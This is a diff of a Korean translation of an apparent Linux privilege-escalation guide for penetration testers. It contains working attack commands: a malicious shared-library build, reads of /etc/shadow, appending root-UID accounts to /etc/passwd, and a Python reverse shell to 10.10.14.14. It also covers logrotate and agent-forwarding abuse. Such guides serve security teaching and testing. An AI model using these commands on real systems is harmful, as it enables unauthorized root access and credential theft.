ํ•˜๋‚˜์— ์“ฐ๊ธฐ ๊ถŒํ•œ**์ด ์žˆ๋Š” ๊ฒฝ์šฐ: `/etc/ld.so.conf`, `/etc/ld.so.conf.d/`, `/etc/ld.so.conf.d/` ๋‚ด์˜ ๋ชจ๋“  ํŒŒ์ผ ๋˜๋Š” `/etc/ld.so.conf.d/*.conf` ๋‚ด์˜ ๊ตฌ์„ฑ ํŒŒ์ผ์— ์žˆ๋Š” ๋ชจ๋“  ํด๋”, ๊ทธ๋Š” ๊ถŒํ•œ ์ƒ์Šน์„ ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.\ ๋‹ค์Œ ํŽ˜์ด์ง€์—์„œ **์ด ์ž˜๋ชป๋œ ๊ตฌ์„ฑ์„ ์•…์šฉํ•˜๋Š” ๋ฐฉ๋ฒ•**์„ ํ™•์ธํ•˜์„ธ์š”: {{#ref}} @@ -1033,7 +1033,7 @@ linux-gate.so.1 => (0x005b0000) libc.so.6 => /var/tmp/flag15/libc.so.6 (0x00110000) /lib/ld-linux.so.2 (0x00737000) ``` -๊ทธ๋Ÿฐ ๋‹ค์Œ `/var/tmp`์— ์•…์„ฑ ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ๋ฅผ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค: `gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6` +๊ทธ๋Ÿฐ ๋‹ค์Œ `/var/tmp`์— `gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6`๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์•…์„ฑ ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ๋ฅผ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค. ```c #include #define SHELL "/bin/sh" @@ -1123,8 +1123,8 @@ Check **Valentine box from HTB** for an example. 
### Debian OpenSSL Predictable PRNG - CVE-2008-0166 -2006๋…„ 9์›”๋ถ€ํ„ฐ 2008๋…„ 5์›” 13์ผ ์‚ฌ์ด์— Debian ๊ธฐ๋ฐ˜ ์‹œ์Šคํ…œ(Ubuntu, Kubuntu ๋“ฑ)์—์„œ ์ƒ์„ฑ๋œ ๋ชจ๋“  SSL ๋ฐ SSH ํ‚ค๋Š” ์ด ๋ฒ„๊ทธ์˜ ์˜ํ–ฅ์„ ๋ฐ›์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.\ -์ด ๋ฒ„๊ทธ๋Š” ํ•ด๋‹น OS์—์„œ ์ƒˆ๋กœ์šด ssh ํ‚ค๋ฅผ ์ƒ์„ฑํ•  ๋•Œ ๋ฐœ์ƒํ•˜๋ฉฐ, **๊ฐ€๋Šฅํ•œ ๋ณ€ํ˜•์ด 32,768๊ฐœ๋งŒ ์กด์žฌํ–ˆ์Šต๋‹ˆ๋‹ค**. ์ด๋Š” ๋ชจ๋“  ๊ฐ€๋Šฅ์„ฑ์„ ๊ณ„์‚ฐํ•  ์ˆ˜ ์žˆ์Œ์„ ์˜๋ฏธํ•˜๋ฉฐ, **ssh ๊ณต๊ฐœ ํ‚ค๊ฐ€ ์žˆ์œผ๋ฉด ํ•ด๋‹น ๊ฐœ์ธ ํ‚ค๋ฅผ ๊ฒ€์ƒ‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค**. ๊ณ„์‚ฐ๋œ ๊ฐ€๋Šฅ์„ฑ์€ ์—ฌ๊ธฐ์—์„œ ํ™•์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: [https://github.com/g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh) +๋ชจ๋“  SSL ๋ฐ SSH ํ‚ค๋Š” 2006๋…„ 9์›”๋ถ€ํ„ฐ 2008๋…„ 5์›” 13์ผ ์‚ฌ์ด์— Debian ๊ธฐ๋ฐ˜ ์‹œ์Šคํ…œ(Ubuntu, Kubuntu ๋“ฑ)์—์„œ ์ƒ์„ฑ๋œ ๊ฒฝ์šฐ ์ด ๋ฒ„๊ทธ์˜ ์˜ํ–ฅ์„ ๋ฐ›์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.\ +์ด ๋ฒ„๊ทธ๋Š” ํ•ด๋‹น OS์—์„œ ์ƒˆ๋กœ์šด ssh ํ‚ค๋ฅผ ์ƒ์„ฑํ•  ๋•Œ ๋ฐœ์ƒํ•˜๋ฉฐ, **32,768๊ฐ€์ง€ ๋ณ€ํ˜•๋งŒ ๊ฐ€๋Šฅํ–ˆ์Šต๋‹ˆ๋‹ค**. ์ด๋Š” ๋ชจ๋“  ๊ฐ€๋Šฅ์„ฑ์„ ๊ณ„์‚ฐํ•  ์ˆ˜ ์žˆ์Œ์„ ์˜๋ฏธํ•˜๋ฉฐ, **ssh ๊ณต๊ฐœ ํ‚ค๊ฐ€ ์žˆ์œผ๋ฉด ํ•ด๋‹น ๊ฐœ์ธ ํ‚ค๋ฅผ ๊ฒ€์ƒ‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค**. ๊ณ„์‚ฐ๋œ ๊ฐ€๋Šฅ์„ฑ์€ ์—ฌ๊ธฐ์—์„œ ํ™•์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: [https://github.com/g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh) ### SSH Interesting configuration values @@ -1147,11 +1147,11 @@ root๊ฐ€ ssh๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๋กœ๊ทธ์ธํ•  ์ˆ˜ ์žˆ๋Š”์ง€ ์—ฌ๋ถ€๋ฅผ ์ง€์ •ํ•˜๋ฉฐ, ```bash AuthorizedKeysFile .ssh/authorized_keys access ``` -ํ•ด๋‹น ๊ตฌ์„ฑ์€ ์‚ฌ์šฉ์ž๊ฐ€ "**testusername**"์˜ **private** ํ‚ค๋กœ ๋กœ๊ทธ์ธํ•˜๋ ค๊ณ  ํ•  ๋•Œ, ssh๊ฐ€ ๊ท€ํ•˜์˜ ํ‚ค์˜ ๊ณต๊ฐœ ํ‚ค๋ฅผ `/home/testusername/.ssh/authorized_keys` ๋ฐ `/home/testusername/access`์— ์žˆ๋Š” ํ‚ค์™€ ๋น„๊ตํ•  ๊ฒƒ์ž„์„ ๋‚˜ํƒ€๋ƒ…๋‹ˆ๋‹ค. +ํ•ด๋‹น ๊ตฌ์„ฑ์€ ์‚ฌ์šฉ์ž๊ฐ€ "**testusername**"์˜ **private** ํ‚ค๋กœ ๋กœ๊ทธ์ธํ•˜๋ ค๊ณ  ํ•  ๋•Œ, ssh๊ฐ€ ๊ท€ํ•˜์˜ ํ‚ค์˜ ๊ณต๊ฐœ ํ‚ค๋ฅผ `/home/testusername/.ssh/authorized_keys` ๋ฐ `/home/testusername/access`์— ์œ„์น˜ํ•œ ํ‚ค์™€ ๋น„๊ตํ•  ๊ฒƒ์ž„์„ ๋‚˜ํƒ€๋ƒ…๋‹ˆ๋‹ค. ### ForwardAgent/AllowAgentForwarding -SSH ์—์ด์ „ํŠธ ํฌ์›Œ๋”ฉ์„ ์‚ฌ์šฉํ•˜๋ฉด **์„œ๋ฒ„์— ํ‚ค๋ฅผ ๋‚จ๊ธฐ์ง€ ์•Š๊ณ ** **๋กœ์ปฌ SSH ํ‚ค๋ฅผ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค** (๋น„๋ฐ€๋ฒˆํ˜ธ ์—†์ด!). ๋”ฐ๋ผ์„œ ssh๋ฅผ ํ†ตํ•ด **ํ˜ธ์ŠคํŠธ๋กœ ์ ํ”„**ํ•˜๊ณ , ๊ฑฐ๊ธฐ์„œ **๋‹ค๋ฅธ** ํ˜ธ์ŠคํŠธ๋กœ **์ ํ”„**ํ•  ์ˆ˜ ์žˆ์œผ๋ฉฐ, **์ดˆ๊ธฐ ํ˜ธ์ŠคํŠธ**์— ์žˆ๋Š” **ํ‚ค**๋ฅผ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. +SSH ์—์ด์ „ํŠธ ํฌ์›Œ๋”ฉ์„ ์‚ฌ์šฉํ•˜๋ฉด **์„œ๋ฒ„์— ํ‚ค๋ฅผ ๋‚จ๊ธฐ์ง€ ์•Š๊ณ ** **๋กœ์ปฌ SSH ํ‚ค๋ฅผ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค** (๋น„๋ฐ€๋ฒˆํ˜ธ ์—†์ด!). ๋”ฐ๋ผ์„œ, ssh๋ฅผ ํ†ตํ•ด **ํ˜ธ์ŠคํŠธ๋กœ ์ ํ”„**ํ•œ ๋‹ค์Œ, ๊ทธ๊ณณ์—์„œ **๋‹ค๋ฅธ** ํ˜ธ์ŠคํŠธ๋กœ **์ ํ”„**ํ•  ์ˆ˜ ์žˆ์œผ๋ฉฐ, **์ดˆ๊ธฐ ํ˜ธ์ŠคํŠธ**์— ์œ„์น˜ํ•œ **ํ‚ค**๋ฅผ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด ์˜ต์…˜์„ `$HOME/.ssh.config`์— ๋‹ค์Œ๊ณผ ๊ฐ™์ด ์„ค์ •ํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค: ``` @@ -1163,17 +1163,17 @@ ForwardAgent yes ํŒŒ์ผ `/etc/ssh_config`๋Š” ์ด **์˜ต์…˜**์„ **์žฌ์ •์˜**ํ•˜๊ณ  ์ด ๊ตฌ์„ฑ์„ ํ—ˆ์šฉํ•˜๊ฑฐ๋‚˜ ๊ฑฐ๋ถ€ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.\ ํŒŒ์ผ `/etc/sshd_config`๋Š” `AllowAgentForwarding` ํ‚ค์›Œ๋“œ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ssh-agent ํฌ์›Œ๋”ฉ์„ **ํ—ˆ์šฉ**ํ•˜๊ฑฐ๋‚˜ **๊ฑฐ๋ถ€**ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค(๊ธฐ๋ณธ๊ฐ’์€ ํ—ˆ์šฉ). -ํ™˜๊ฒฝ์—์„œ Forward Agent๊ฐ€ ๊ตฌ์„ฑ๋˜์–ด ์žˆ๋Š” ๊ฒฝ์šฐ ๋‹ค์Œ ํŽ˜์ด์ง€๋ฅผ ์ฝ์–ด๋ณด์„ธ์š”. **๊ถŒํ•œ ์ƒ์Šน์„ ์œ„ํ•ด ์ด๋ฅผ ์•…์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค**: +ํ™˜๊ฒฝ์—์„œ Forward Agent๊ฐ€ ๊ตฌ์„ฑ๋˜์–ด ์žˆ๋Š” ๊ฒฝ์šฐ ๋‹ค์Œ ํŽ˜์ด์ง€๋ฅผ ์ฝ์–ด๋ณด์„ธ์š”. 
**๊ถŒํ•œ ์ƒ์Šน์„ ์•…์šฉํ•  ์ˆ˜ ์žˆ์„์ง€๋„ ๋ชจ๋ฆ…๋‹ˆ๋‹ค**: {{#ref}} ssh-forward-agent-exploitation.md {{#endref}} -## ํฅ๋ฏธ๋กœ์šด ํŒŒ์ผ +## ํฅ๋ฏธ๋กœ์šด ํŒŒ์ผ๋“ค ### ํ”„๋กœํŒŒ์ผ ํŒŒ์ผ -ํŒŒ์ผ `/etc/profile` ๋ฐ `/etc/profile.d/` ์•„๋ž˜์˜ ํŒŒ์ผ์€ **์‚ฌ์šฉ์ž๊ฐ€ ์ƒˆ ์…ธ์„ ์‹คํ–‰ํ•  ๋•Œ ์‹คํ–‰๋˜๋Š” ์Šคํฌ๋ฆฝํŠธ**์ž…๋‹ˆ๋‹ค. ๋”ฐ๋ผ์„œ, ์ด๋“ค ์ค‘ ํ•˜๋‚˜๋ฅผ **์ž‘์„ฑํ•˜๊ฑฐ๋‚˜ ์ˆ˜์ •ํ•  ์ˆ˜ ์žˆ๋‹ค๋ฉด ๊ถŒํ•œ์„ ์ƒ์Šน์‹œํ‚ฌ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค**. +ํŒŒ์ผ `/etc/profile` ๋ฐ `/etc/profile.d/` ์•„๋ž˜์˜ ํŒŒ์ผ๋“ค์€ **์‚ฌ์šฉ์ž๊ฐ€ ์ƒˆ๋กœ์šด ์…ธ์„ ์‹คํ–‰ํ•  ๋•Œ ์‹คํ–‰๋˜๋Š” ์Šคํฌ๋ฆฝํŠธ**์ž…๋‹ˆ๋‹ค. ๋”ฐ๋ผ์„œ, ์ด๋“ค ์ค‘ ํ•˜๋‚˜๋ฅผ **์ž‘์„ฑํ•˜๊ฑฐ๋‚˜ ์ˆ˜์ •ํ•  ์ˆ˜ ์žˆ๋‹ค๋ฉด ๊ถŒํ•œ์„ ์ƒ์Šน์‹œํ‚ฌ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค**. ```bash ls -l /etc/profile /etc/profile.d/ ``` @@ -1181,7 +1181,7 @@ ls -l /etc/profile /etc/profile.d/ ### Passwd/Shadow ํŒŒ์ผ -์šด์˜ ์ฒด์ œ์— ๋”ฐ๋ผ `/etc/passwd` ๋ฐ `/etc/shadow` ํŒŒ์ผ์ด ๋‹ค๋ฅธ ์ด๋ฆ„์„ ์‚ฌ์šฉํ•˜๊ฑฐ๋‚˜ ๋ฐฑ์—…์ด ์žˆ์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋”ฐ๋ผ์„œ **๋ชจ๋‘ ์ฐพ์•„๋ณด๊ณ ** **์ฝ์„ ์ˆ˜ ์žˆ๋Š”์ง€ ํ™•์ธ**ํ•˜์—ฌ ํŒŒ์ผ ์•ˆ์— **ํ•ด์‹œ๊ฐ€ ์žˆ๋Š”์ง€** ํ™•์ธํ•˜๋Š” ๊ฒƒ์ด ์ข‹์Šต๋‹ˆ๋‹ค: +์šด์˜ ์ฒด์ œ์— ๋”ฐ๋ผ `/etc/passwd` ๋ฐ `/etc/shadow` ํŒŒ์ผ์ด ๋‹ค๋ฅธ ์ด๋ฆ„์„ ์‚ฌ์šฉํ•˜๊ฑฐ๋‚˜ ๋ฐฑ์—…์ด ์žˆ์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋”ฐ๋ผ์„œ **๋ชจ๋‘ ์ฐพ๊ณ ** **์ฝ์„ ์ˆ˜ ์žˆ๋Š”์ง€ ํ™•์ธ**ํ•˜์—ฌ ํŒŒ์ผ ์•ˆ์— **ํ•ด์‹œ๊ฐ€ ์žˆ๋Š”์ง€** ํ™•์ธํ•˜๋Š” ๊ฒƒ์ด ์ข‹์Šต๋‹ˆ๋‹ค: ```bash #Passwd equivalent files cat /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null @@ -1200,13 +1200,13 @@ openssl passwd -1 -salt hacker hacker mkpasswd -m SHA-512 hacker python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")' ``` -์‚ฌ์šฉ์ž `hacker`๋ฅผ ์ถ”๊ฐ€ํ•˜๊ณ  ์ƒ์„ฑ๋œ ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ์ถ”๊ฐ€ํ•ฉ๋‹ˆ๋‹ค. +๊ทธ๋Ÿฐ ๋‹ค์Œ ์‚ฌ์šฉ์ž `hacker`๋ฅผ ์ถ”๊ฐ€ํ•˜๊ณ  ์ƒ์„ฑ๋œ ๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ์ถ”๊ฐ€ํ•ฉ๋‹ˆ๋‹ค. ``` hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash ``` E.g: `hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash` -์ด์ œ `hacker:hacker`๋กœ `su` ๋ช…๋ น์„ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. +์ด์ œ `su` ๋ช…๋ น์–ด๋ฅผ `hacker:hacker`๋กœ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋˜๋Š” ๋‹ค์Œ ์ค„์„ ์‚ฌ์šฉํ•˜์—ฌ ๋น„๋ฐ€๋ฒˆํ˜ธ๊ฐ€ ์—†๋Š” ๋”๋ฏธ ์‚ฌ์šฉ์ž๋ฅผ ์ถ”๊ฐ€ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.\ ๊ฒฝ๊ณ : ํ˜„์žฌ ๋จธ์‹ ์˜ ๋ณด์•ˆ์„ ์ €ํ•˜์‹œํ‚ฌ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. @@ -1214,7 +1214,7 @@ E.g: `hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash` echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd su - dummy ``` -NOTE: BSD ํ”Œ๋žซํผ์—์„œ๋Š” `/etc/passwd`๊ฐ€ `/etc/pwd.db` ๋ฐ `/etc/master.passwd`์— ์œ„์น˜ํ•˜๋ฉฐ, `/etc/shadow`๋Š” `/etc/spwd.db`๋กœ ์ด๋ฆ„์ด ๋ณ€๊ฒฝ๋˜์—ˆ์Šต๋‹ˆ๋‹ค. +NOTE: BSD ํ”Œ๋žซํผ์—์„œ๋Š” `/etc/passwd`๊ฐ€ `/etc/pwd.db` ๋ฐ `/etc/master.passwd`์— ์œ„์น˜ํ•˜๊ณ , `/etc/shadow`๋Š” `/etc/spwd.db`๋กœ ์ด๋ฆ„์ด ๋ณ€๊ฒฝ๋ฉ๋‹ˆ๋‹ค. ๋ฏผ๊ฐํ•œ ํŒŒ์ผ์— **์“ฐ๊ธฐ**๊ฐ€ ๊ฐ€๋Šฅํ•œ์ง€ ํ™•์ธํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค. ์˜ˆ๋ฅผ ๋“ค์–ด, **์„œ๋น„์Šค ๊ตฌ์„ฑ ํŒŒ์ผ**์— ์“ธ ์ˆ˜ ์žˆ์Šต๋‹ˆ๊นŒ? ```bash @@ -1292,7 +1292,7 @@ Read the code of [**linPEAS**](https://github.com/carlospolop/privilege-escalati ### Logs If you can read logs, you may be able to find **ํฅ๋ฏธ๋กœ์šด/๊ธฐ๋ฐ€ ์ •๋ณด๊ฐ€ ๊ทธ ์•ˆ์— ์žˆ์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค**. ๋กœ๊ทธ๊ฐ€ ์ด์ƒํ• ์ˆ˜๋ก ๋” ํฅ๋ฏธ๋กœ์šธ ๊ฒƒ์ž…๋‹ˆ๋‹ค (์•„๋งˆ๋„).\ -๋˜ํ•œ, ์ผ๋ถ€ "**์ž˜๋ชป๋œ**" ๊ตฌ์„ฑ๋œ (๋ฐฑ๋„์–ด๊ฐ€ ์žˆ๋Š”?) 
**๊ฐ์‚ฌ ๋กœ๊ทธ**๋Š” ์ด ๊ฒŒ์‹œ๋ฌผ์—์„œ ์„ค๋ช…ํ•œ ๋Œ€๋กœ ๊ฐ์‚ฌ ๋กœ๊ทธ์— **๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ๊ธฐ๋กํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ด์ค„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค**: [https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/](https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/). +๋˜ํ•œ, "**์ž˜๋ชป๋œ**" ๊ตฌ์„ฑ(๋ฐฑ๋„์–ด?)๋œ **๊ฐ์‚ฌ ๋กœ๊ทธ**๋Š” ์ด ๊ฒŒ์‹œ๋ฌผ์—์„œ ์„ค๋ช…ํ•œ ๋Œ€๋กœ ๊ฐ์‚ฌ ๋กœ๊ทธ์— **๋น„๋ฐ€๋ฒˆํ˜ธ๋ฅผ ๊ธฐ๋กํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ด์ค„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค**: [https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/](https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/). ```bash aureport --tty | grep -E "su |sudo " | sed -E "s,su|sudo,${C}[1;31m&${C}[0m,g" grep -RE 'comm="su"|comm="sudo"' /var/log* 2>/dev/null @@ -1325,18 +1325,18 @@ grep -RE 'comm="su"|comm="sudo"' /var/log* 2>/dev/null ```python import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.14",5678));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]); ``` -### Logrotate ์•…์šฉ +### Logrotate exploitation -`logrotate`์˜ ์ทจ์•ฝ์ ์€ ๋กœ๊ทธ ํŒŒ์ผ์ด๋‚˜ ๊ทธ ์ƒ์œ„ ๋””๋ ‰ํ† ๋ฆฌ์— **์“ฐ๊ธฐ ๊ถŒํ•œ**์ด ์žˆ๋Š” ์‚ฌ์šฉ์ž๊ฐ€ ๊ถŒํ•œ ์ƒ์Šน์„ ์–ป์„ ์ˆ˜ ์žˆ๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค. ์ด๋Š” `logrotate`๊ฐ€ ์ข…์ข… **root**๋กœ ์‹คํ–‰๋˜๊ธฐ ๋•Œ๋ฌธ์—, _**/etc/bash_completion.d/**_์™€ ๊ฐ™์€ ๋””๋ ‰ํ† ๋ฆฌ์—์„œ ์ž„์˜์˜ ํŒŒ์ผ์„ ์‹คํ–‰ํ•˜๋„๋ก ์กฐ์ž‘๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋กœ๊ทธ ํšŒ์ „์ด ์ ์šฉ๋˜๋Š” ๋ชจ๋“  ๋””๋ ‰ํ† ๋ฆฌ๋ฟ๋งŒ ์•„๋‹ˆ๋ผ _/var/log_์—์„œ๋„ ๊ถŒํ•œ์„ ํ™•์ธํ•˜๋Š” ๊ฒƒ์ด ์ค‘์š”ํ•ฉ๋‹ˆ๋‹ค. +`logrotate`์˜ ์ทจ์•ฝ์ ์€ ๋กœ๊ทธ ํŒŒ์ผ์ด๋‚˜ ๊ทธ ์ƒ์œ„ ๋””๋ ‰ํ† ๋ฆฌ์— **์“ฐ๊ธฐ ๊ถŒํ•œ**์ด ์žˆ๋Š” ์‚ฌ์šฉ์ž๊ฐ€ ์ž ์žฌ์ ์œผ๋กœ ๊ถŒํ•œ ์ƒ์Šน์„ ์–ป์„ ์ˆ˜ ์žˆ๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค. ์ด๋Š” `logrotate`๊ฐ€ ์ข…์ข… **root**๋กœ ์‹คํ–‰๋˜๊ธฐ ๋•Œ๋ฌธ์—, _**/etc/bash_completion.d/**_์™€ ๊ฐ™์€ ๋””๋ ‰ํ† ๋ฆฌ์—์„œ ์ž„์˜์˜ ํŒŒ์ผ์„ ์‹คํ–‰ํ•˜๋„๋ก ์กฐ์ž‘๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋กœ๊ทธ ํšŒ์ „์ด ์ ์šฉ๋˜๋Š” ๋ชจ๋“  ๋””๋ ‰ํ† ๋ฆฌ์—์„œ _/var/log_๋ฟ๋งŒ ์•„๋‹ˆ๋ผ ๊ถŒํ•œ์„ ํ™•์ธํ•˜๋Š” ๊ฒƒ์ด ์ค‘์š”ํ•ฉ๋‹ˆ๋‹ค. -> [!NOTE] +> [!TIP] > ์ด ์ทจ์•ฝ์ ์€ `logrotate` ๋ฒ„์ „ `3.18.0` ๋ฐ ์ด์ „ ๋ฒ„์ „์— ์˜ํ–ฅ์„ ๋ฏธ์นฉ๋‹ˆ๋‹ค. ์ทจ์•ฝ์ ์— ๋Œ€ํ•œ ๋” ์ž์„ธํ•œ ์ •๋ณด๋Š” ์ด ํŽ˜์ด์ง€์—์„œ ํ™•์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค: [https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition](https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition). ์ด ์ทจ์•ฝ์ ์€ [**logrotten**](https://github.com/whotwagner/logrotten)์œผ๋กœ ์•…์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. -์ด ์ทจ์•ฝ์ ์€ [**CVE-2016-1247**](https://www.cvedetails.com/cve/CVE-2016-1247/) **(nginx ๋กœ๊ทธ)**์™€ ๋งค์šฐ ์œ ์‚ฌํ•˜๋ฏ€๋กœ, ๋กœ๊ทธ๋ฅผ ๋ณ€๊ฒฝํ•  ์ˆ˜ ์žˆ๋Š” ๊ฒฝ์šฐ ๋กœ๊ทธ๋ฅผ ๊ด€๋ฆฌํ•˜๋Š” ์‚ฌ๋žŒ์ด ๋ˆ„๊ตฌ์ธ์ง€ ํ™•์ธํ•˜๊ณ , ์‹ฌ๋ณผ๋ฆญ ๋งํฌ๋กœ ๋กœ๊ทธ๋ฅผ ๋Œ€์ฒดํ•˜์—ฌ ๊ถŒํ•œ ์ƒ์Šน์ด ๊ฐ€๋Šฅํ•œ์ง€ ํ™•์ธํ•˜์‹ญ์‹œ์˜ค. +์ด ์ทจ์•ฝ์ ์€ [**CVE-2016-1247**](https://www.cvedetails.com/cve/CVE-2016-1247/) **(nginx ๋กœ๊ทธ)**์™€ ๋งค์šฐ ์œ ์‚ฌํ•˜๋ฏ€๋กœ, ๋กœ๊ทธ๋ฅผ ๋ณ€๊ฒฝํ•  ์ˆ˜ ์žˆ๋Š” ๊ฒฝ์šฐ ๋กœ๊ทธ๋ฅผ ๊ด€๋ฆฌํ•˜๋Š” ์‚ฌ๋žŒ์ด ๋ˆ„๊ตฌ์ธ์ง€ ํ™•์ธํ•˜๊ณ , ์‹ฌ๋ณผ๋ฆญ ๋งํฌ๋กœ ๋กœ๊ทธ๋ฅผ ๋Œ€์ฒดํ•˜์—ฌ ๊ถŒํ•œ์„ ์ƒ์Šน์‹œํ‚ฌ ์ˆ˜ ์žˆ๋Š”์ง€ ํ™•์ธํ•˜์‹ญ์‹œ์˜ค. ### /etc/sysconfig/network-scripts/ (Centos/Redhat) @@ -1356,11 +1356,11 @@ DEVICE=eth0 ``` ### **init, init.d, systemd, ๋ฐ rc.d** -๋””๋ ‰ํ† ๋ฆฌ `/etc/init.d`๋Š” **System V init (SysVinit)**์„ ์œ„ํ•œ **์Šคํฌ๋ฆฝํŠธ**์˜ ์ง‘ํ•ฉ์ž…๋‹ˆ๋‹ค. 
์ด๋Š” **๊ณ ์ „์ ์ธ ๋ฆฌ๋ˆ…์Šค ์„œ๋น„์Šค ๊ด€๋ฆฌ ์‹œ์Šคํ…œ**์œผ๋กœ, ์„œ๋น„์Šค์˜ `start`, `stop`, `restart`, ๋•Œ๋•Œ๋กœ `reload`๋ฅผ ์œ„ํ•œ ์Šคํฌ๋ฆฝํŠธ๋ฅผ ํฌํ•จํ•ฉ๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ์Šคํฌ๋ฆฝํŠธ๋Š” ์ง์ ‘ ์‹คํ–‰ํ•˜๊ฑฐ๋‚˜ `/etc/rc?.d/`์— ์žˆ๋Š” ์‹ฌ๋ณผ๋ฆญ ๋งํฌ๋ฅผ ํ†ตํ•ด ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. Redhat ์‹œ์Šคํ…œ์˜ ๋Œ€์ฒด ๊ฒฝ๋กœ๋Š” `/etc/rc.d/init.d`์ž…๋‹ˆ๋‹ค. +๋””๋ ‰ํ† ๋ฆฌ `/etc/init.d`๋Š” **System V init (SysVinit)**์„ ์œ„ํ•œ **์Šคํฌ๋ฆฝํŠธ**์˜ ์ง‘ํ•ฉ์ž…๋‹ˆ๋‹ค. ์ด๋Š” **๊ณ ์ „์ ์ธ ๋ฆฌ๋ˆ…์Šค ์„œ๋น„์Šค ๊ด€๋ฆฌ ์‹œ์Šคํ…œ**์œผ๋กœ, ์„œ๋น„์Šค์˜ `start`, `stop`, `restart`, ๋•Œ๋•Œ๋กœ `reload`๋ฅผ ์œ„ํ•œ ์Šคํฌ๋ฆฝํŠธ๋ฅผ ํฌํ•จํ•ฉ๋‹ˆ๋‹ค. ์ด ์Šคํฌ๋ฆฝํŠธ๋Š” ์ง์ ‘ ์‹คํ–‰ํ•˜๊ฑฐ๋‚˜ `/etc/rc?.d/`์— ์žˆ๋Š” ์‹ฌ๋ณผ๋ฆญ ๋งํฌ๋ฅผ ํ†ตํ•ด ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. Redhat ์‹œ์Šคํ…œ์˜ ๋Œ€์ฒด ๊ฒฝ๋กœ๋Š” `/etc/rc.d/init.d`์ž…๋‹ˆ๋‹ค. ๋ฐ˜๋ฉด์—, `/etc/init`๋Š” **Upstart**์™€ ๊ด€๋ จ์ด ์žˆ์œผ๋ฉฐ, ์ด๋Š” Ubuntu์—์„œ ๋„์ž…ํ•œ ์ตœ์‹  **์„œ๋น„์Šค ๊ด€๋ฆฌ**๋กœ, ์„œ๋น„์Šค ๊ด€๋ฆฌ ์ž‘์—…์„ ์œ„ํ•œ ๊ตฌ์„ฑ ํŒŒ์ผ์„ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค. Upstart๋กœ์˜ ์ „ํ™˜์—๋„ 